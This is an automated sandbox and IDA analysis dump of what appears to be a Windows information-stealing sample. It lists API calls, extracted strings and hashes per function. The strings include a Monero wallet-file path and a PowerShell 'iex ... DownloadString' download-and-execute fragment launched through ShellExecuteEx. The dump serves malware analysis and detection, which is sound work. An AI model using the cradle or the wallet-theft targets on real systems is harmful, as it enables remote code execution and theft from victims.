                    • Instruction ID: 1c6d514ccee3e68ef976e8355cf4fa173d4dc6a85d641155b68a4478d20ed996
                    • Opcode Fuzzy Hash: 267f32bcb0cbf858df70d673729166937cc0ed3d54e75f9be75acea31629588b
                    • Instruction Fuzzy Hash: F9F03A3090420DEFD34C9FE0E90D76C7B70FB45747F040198F64986294D6748A829B96
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00634FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00634FD1
                    • InternetOpenA.WININET(00650DDF,00000000,00000000,00000000,00000000), ref: 00634FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00635011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00635041
                    • InternetCloseHandle.WININET(?), ref: 006350B9
                    • InternetCloseHandle.WININET(?), ref: 006350C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 225d54a82c9c156fc38ec64e86863e0a2f03824dce10a1f38b9a514404cc41b6
                    • Instruction ID: 0b8c2701699a3f74f05176ecb2a7e957d05c779c4d66c1f3166385ea29284c68
                    • Opcode Fuzzy Hash: 225d54a82c9c156fc38ec64e86863e0a2f03824dce10a1f38b9a514404cc41b6
                    • Instruction Fuzzy Hash: 9F31F9B4A40218ABDB24CF54DC89BDCB7B5FB48704F1081D9FA09A7285C7706EC58F99
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01450228,00000000,?,00650E2C,00000000,?,00000000), ref: 00648130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00648158
                    • wsprintfA.USER32 ref: 006481AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2922868504-3474575989
                    • Opcode ID: b095ea2aacda836f471db228a31794356334804935215b5fad34de6503ba1a3b
                    • Instruction ID: 2308df692471e4261baa7e2a0aa5f71c252b4357759eb13e0442e69cf09d04e3
                    • Opcode Fuzzy Hash: b095ea2aacda836f471db228a31794356334804935215b5fad34de6503ba1a3b
                    • Instruction Fuzzy Hash: 6B214AB1E44209ABDB04DFD4CC49FAEB7B9FB44B04F104219F605BB280C778A9018BA9
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00648426
                    • wsprintfA.USER32 ref: 00648459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0064847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648499
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,014500A8,00000000,000F003F,?,00000400), ref: 006484EC
                    • lstrlen.KERNEL32(?), ref: 00648501
                    • RegQueryValueExA.ADVAPI32(00000000,01450150,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00650B34), ref: 00648599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 53a4cceef4f3bf3ae4df5abfdc834ccf890e6a621329cf91b34e9d9e7617e49f
                    • Instruction ID: 063b2849540b9b36e5c7966611795b6a091b9c7cc850de92520467ce1e1693b6
                    • Opcode Fuzzy Hash: 53a4cceef4f3bf3ae4df5abfdc834ccf890e6a621329cf91b34e9d9e7617e49f
                    • Instruction Fuzzy Hash: 05210A71900218AFDB68DB54DC85FE9B3B9FB48705F00C198A609A6180DF71AAC5CFD5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006476A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006476AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0143CEB8,00000000,00020119,00000000), ref: 006476DD
                    • RegQueryValueExA.ADVAPI32(00000000,014501E0,00000000,00000000,?,000000FF), ref: 006476FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00647708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: ec01eab0967688e69f58668368f29564da6a37855785c655b582c4e343c90866
                    • Instruction ID: ce1d846d6d293bf9fa86011c3f8dd771b1e2be921f21bffed63f3520afedddff
                    • Opcode Fuzzy Hash: ec01eab0967688e69f58668368f29564da6a37855785c655b582c4e343c90866
                    • Instruction Fuzzy Hash: 9B014FB5A44204BBEB04DBE4DC4DFADB7B9FB88702F104454FA08A7295D771D9848B92
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0064773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0143CEB8,00000000,00020119,006476B9), ref: 0064775B
                    • RegQueryValueExA.ADVAPI32(006476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0064777A
                    • RegCloseKey.ADVAPI32(006476B9), ref: 00647784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 68d867e4804959c438b8244e2c70af9200942eb97074bf8af3533bd295e38416
                    • Instruction ID: 83ead87491061b66983fc8ab43b73ab4905144823a504594023282e78c3a05b3
                    • Opcode Fuzzy Hash: 68d867e4804959c438b8244e2c70af9200942eb97074bf8af3533bd295e38416
                    • Instruction Fuzzy Hash: 7E0144B5A40308BBE704DBE4DC4DFAEB7B8FB84705F104558FA09A7285D67095408B52
                    APIs
                    • CreateFileA.KERNEL32(:d,80000000,00000003,00000000,00000003,00000080,00000000,?,00643AEE,?), ref: 006492FC
                    • GetFileSizeEx.KERNEL32(000000FF,:d), ref: 00649319
                    • CloseHandle.KERNEL32(000000FF), ref: 00649327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :d$:d
                    • API String ID: 1378416451-2737858857
                    • Opcode ID: ebee48d0f3d28f9d4c02d9886a4eaeefe3cf5b1be0bc197b9acf506aca29d726
                    • Instruction ID: 31b7093225a06c170003ae1b242026bd136bdacb77d16dc46cc00c56eab258f8
                    • Opcode Fuzzy Hash: ebee48d0f3d28f9d4c02d9886a4eaeefe3cf5b1be0bc197b9acf506aca29d726
                    • Instruction Fuzzy Hash: 86F08C34E40208BBDB18DFB0DC09F9E77FABB88350F108254B655A72C4D670DA818F50
                    APIs
                    • memset.MSVCRT ref: 006440D5
                    • RegOpenKeyExA.ADVAPI32(80000001,0144E7A0,00000000,00020119,?), ref: 006440F4
                    • RegQueryValueExA.ADVAPI32(?,014504E0,00000000,00000000,00000000,000000FF), ref: 00644118
                    • RegCloseKey.ADVAPI32(?), ref: 00644122
                    • lstrcat.KERNEL32(?,00000000), ref: 00644147
                    • lstrcat.KERNEL32(?,01450450), ref: 0064415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValuememset
                    • String ID:
                    • API String ID: 2623679115-0
                    • Opcode ID: 2f4857f697b95f273a9490bb83d72261b670b3a9eefcfdd3dbec9401e5d02da0
                    • Instruction ID: c8f6843053167a55145de2d4ca3c5ee677e6fe6be0590617af30a51a1568fe88
                    • Opcode Fuzzy Hash: 2f4857f697b95f273a9490bb83d72261b670b3a9eefcfdd3dbec9401e5d02da0
                    • Instruction Fuzzy Hash: AB416AB69001086BDB18FBA0DC5AFFE737DB788300F40455DB61A57185EA759BC88BD2
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                    • LocalFree.KERNEL32(0063148F), ref: 00639A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 9b5113d470399e149099a0b335645be6f790a7d990a08d04dafd90b5c06e5962
                    • Instruction ID: 1ea715660b8077dc3d890998b55507f8612ee3afb81cebe64c2f7c8a3574e5e3
                    • Opcode Fuzzy Hash: 9b5113d470399e149099a0b335645be6f790a7d990a08d04dafd90b5c06e5962
                    • Instruction Fuzzy Hash: 24312B74A00209EFDB14DF94C889BEE77B6FF48341F108258E915A7394D775A981CFA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Typememset
                    • String ID:
                    • API String ID: 3530896902-3916222277
                    • Opcode ID: a9922661b219bf2438093a7261df30d8d2fc5a9286099c04b5d7cbac8dfb406c
                    • Instruction ID: 529c2c9e4f4806cc137be50168374e2c163109c5f2bfe8b008fd7ff5aab0cc5a
                    • Opcode Fuzzy Hash: a9922661b219bf2438093a7261df30d8d2fc5a9286099c04b5d7cbac8dfb406c
                    • Instruction Fuzzy Hash: 2F41277150175CAEDB618B24CC84FFBBBEA9F45314F1444ECE9CA86282D2719A45DF24
                    APIs
                    • lstrcat.KERNEL32(?,014503C0), ref: 006447DB
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644801
                    • lstrcat.KERNEL32(?,?), ref: 00644820
                    • lstrcat.KERNEL32(?,?), ref: 00644834
                    • lstrcat.KERNEL32(?,0143CA18), ref: 00644847
                    • lstrcat.KERNEL32(?,?), ref: 0064485B
                    • lstrcat.KERNEL32(?,0144E5A0), ref: 0064486F
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648D90: GetFileAttributesA.KERNEL32(00000000,?,00631B54,?,?,0065564C,?,?,00650E1F), ref: 00648D9F
                      • Part of subcall function 00644570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00644580
                      • Part of subcall function 00644570: RtlAllocateHeap.NTDLL(00000000), ref: 00644587
                      • Part of subcall function 00644570: wsprintfA.USER32 ref: 006445A6
                      • Part of subcall function 00644570: FindFirstFileA.KERNEL32(?,?), ref: 006445BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 1c489fbd10a0c0f78d5f2a0fa827f8dd9750361676dfb1ccc5ec673d7d1dfc1a
                    • Instruction ID: 162fccdc29c5e1cf4d7e5a3c65491fab5471f6e55584478cceedc7f781730e80
                    • Opcode Fuzzy Hash: 1c489fbd10a0c0f78d5f2a0fa827f8dd9750361676dfb1ccc5ec673d7d1dfc1a
                    • Instruction Fuzzy Hash: 7F3160B2900208ABCB54FBA0DC89EED7379BB48700F44459DB31996081EE74D6C98B9A
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00642D85
                    Strings
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00642D04
                    • ')", xrefs: 00642CB3
                    • <, xrefs: 00642D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00642CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: 0644a4e5255ee7fa7c04fcbfd80e7b1ba8132b2d6c7b4e427a272d02e9acb590
                    • Instruction ID: 1ecd78e6d9ca5f9d69530701d6249d2d18851f3cbbe6ae47ea396fbe9aefb638
                    • Opcode Fuzzy Hash: 0644a4e5255ee7fa7c04fcbfd80e7b1ba8132b2d6c7b4e427a272d02e9acb590
                    • Instruction Fuzzy Hash: 6041EC71C50208AEEB54EFE0C892BEDBB76AF14304F50411DF406A7192DF746A8ACF95
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00639F41
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: a6db3b74392d68df59ebcce0fe7a7945a7ffbc37c43e66a9482d5f4c2b7dec57
                    • Instruction ID: 7f143612c3578a10b4df88f1a2ceb1bee750e6686f0559b57eaf0bb9f068c34d
                    • Opcode Fuzzy Hash: a6db3b74392d68df59ebcce0fe7a7945a7ffbc37c43e66a9482d5f4c2b7dec57
                    • Instruction Fuzzy Hash: F9615075A40208AFEB28EFA4CD96FED7776AF45304F00801CF90A5F191DB746A46CB96
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • memset.MSVCRT ref: 0064716A
                    Strings
                    • sd, xrefs: 006472AE, 00647179, 0064717C
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0064718C
                    • sd, xrefs: 00647111
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpymemset
                    • String ID: sd$sd$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 4047604823-582212991
                    • Opcode ID: d77cedc55126bb76f997b9497bf6e7457c99dbc238f83773d5466f538ee028d1
                    • Instruction ID: caf90a67edc187a76edf003e57ecd289570094e81a6ad674ee227118df7660d2
                    • Opcode Fuzzy Hash: d77cedc55126bb76f997b9497bf6e7457c99dbc238f83773d5466f538ee028d1
                    • Instruction Fuzzy Hash: 2B516DB0D44218AFDB64EBA0DC85BEEB376AF54304F1440ACE51577281EB746E88CF59
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0143D430,00000000,00020119,?), ref: 00647E5E
                    • RegQueryValueExA.ADVAPI32(?,0144E840,00000000,00000000,000000FF,000000FF), ref: 00647E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00647E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: dbc752a6777f0cbe973f3702365b0cc7e94add59d010d9d752f860b0cca79ac4
                    • Instruction ID: eeb0530ac28122dc7b81af035a25a0cde7d620a3a42f6f949d8d91097ba24e7d
                    • Opcode Fuzzy Hash: dbc752a6777f0cbe973f3702365b0cc7e94add59d010d9d752f860b0cca79ac4
                    • Instruction Fuzzy Hash: C211A0B1A44205EBD708CF94DC49FBFBBBDFB44B01F104269FA09A7284D77498418BA2
                    APIs
                    • StrStrA.SHLWAPI(01450348,?,?,?,0064140C,?,01450348,00000000), ref: 0064926C
                    • lstrcpyn.KERNEL32(0087AB88,01450348,01450348,?,0064140C,?,01450348), ref: 00649290
                    • lstrlen.KERNEL32(?,?,0064140C,?,01450348), ref: 006492A7
                    • wsprintfA.USER32 ref: 006492C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: 320e53cddf6a0be511074b2aae754b75e909c05e0957515ab13dc67d1dec699a
                    • Instruction ID: 886653741c46a9b0fd41feb49444aace6f3dc2713fd99b6b34a87bf76e0e6630
                    • Opcode Fuzzy Hash: 320e53cddf6a0be511074b2aae754b75e909c05e0957515ab13dc67d1dec699a
                    • Instruction Fuzzy Hash: 9B01A975500108FFCB08DFE8C988EAE7BB9FB84365F108148F9099B208C671EA40DBA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006312B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006312BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006312D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006312F5
                    • RegCloseKey.ADVAPI32(?), ref: 006312FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 4859acf301ef02447925c5ba09a68dd09369dd76db669f7f4acb0d4d22187b52
                    • Instruction ID: cbd8f9437713797e06d99a6abed02a9304b65ef7bdd117e52ace84a90dd9966a
                    • Opcode Fuzzy Hash: 4859acf301ef02447925c5ba09a68dd09369dd76db669f7f4acb0d4d22187b52
                    • Instruction Fuzzy Hash: C70136B5A40208BBDB04DFD0DC4DFAEB7B8FB88701F008155FA0997284D671DA418F51
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00646663
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00646726
                    • ExitProcess.KERNEL32 ref: 00646755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: fd9858497478de8a9850613112a35d4541a1b817431f52d360a55a18e1abcfa0
                    • Instruction ID: 281958693eababd53c9985fb9e9dd1f9382094847893e560857721093668acb6
                    • Opcode Fuzzy Hash: fd9858497478de8a9850613112a35d4541a1b817431f52d360a55a18e1abcfa0
                    • Instruction Fuzzy Hash: 6D312BB1801218AEEB58EB90DC96BDEB779BF44300F404199F20966191DF746B89CF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00650E28,00000000,?), ref: 0064882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648836
                    • wsprintfA.USER32 ref: 00648850
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 1b6c59c4688435af31ee800e7ddeeaa173f671aecaa2cc08d475bde1ff518d92
                    • Instruction ID: 1abfe6843f677d2f3a914621d871404c646e0a001ba1304d31c8c3b532e4d468
                    • Opcode Fuzzy Hash: 1b6c59c4688435af31ee800e7ddeeaa173f671aecaa2cc08d475bde1ff518d92
                    • Instruction Fuzzy Hash: F12172B1E44204AFDB08DFD4DD49FAEBBB9FB48701F104159F609A7284C7799900CBA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0064951E,00000000), ref: 00648D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648D62
                    • wsprintfW.USER32 ref: 00648D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: a25617e58b5b05407188335fd0c4c3f545a6659da9c3061f39243b067efeab49
                    • Instruction ID: e31d9e8e81240df0d97e062d1345a30fc74df6238d7e2c0eba08520ab3108a78
                    • Opcode Fuzzy Hash: a25617e58b5b05407188335fd0c4c3f545a6659da9c3061f39243b067efeab49
                    • Instruction Fuzzy Hash: 43E08CB0A40208BBDB08DB94DC0EE6D77BCFB84702F0400A4FD0D87280DA71DE408BA2
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0063A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0063A6BC
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0063A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 8b965d01f272f1de6fb4a4a551615ee1f1f0047e241f8a6d1f12c0597f7526eb
                    • Instruction ID: 7f83449a0e803c907e4ad6bfaa57fa6881e1b7e9c5a40fa007201f597ab5c66b
                    • Opcode Fuzzy Hash: 8b965d01f272f1de6fb4a4a551615ee1f1f0047e241f8a6d1f12c0597f7526eb
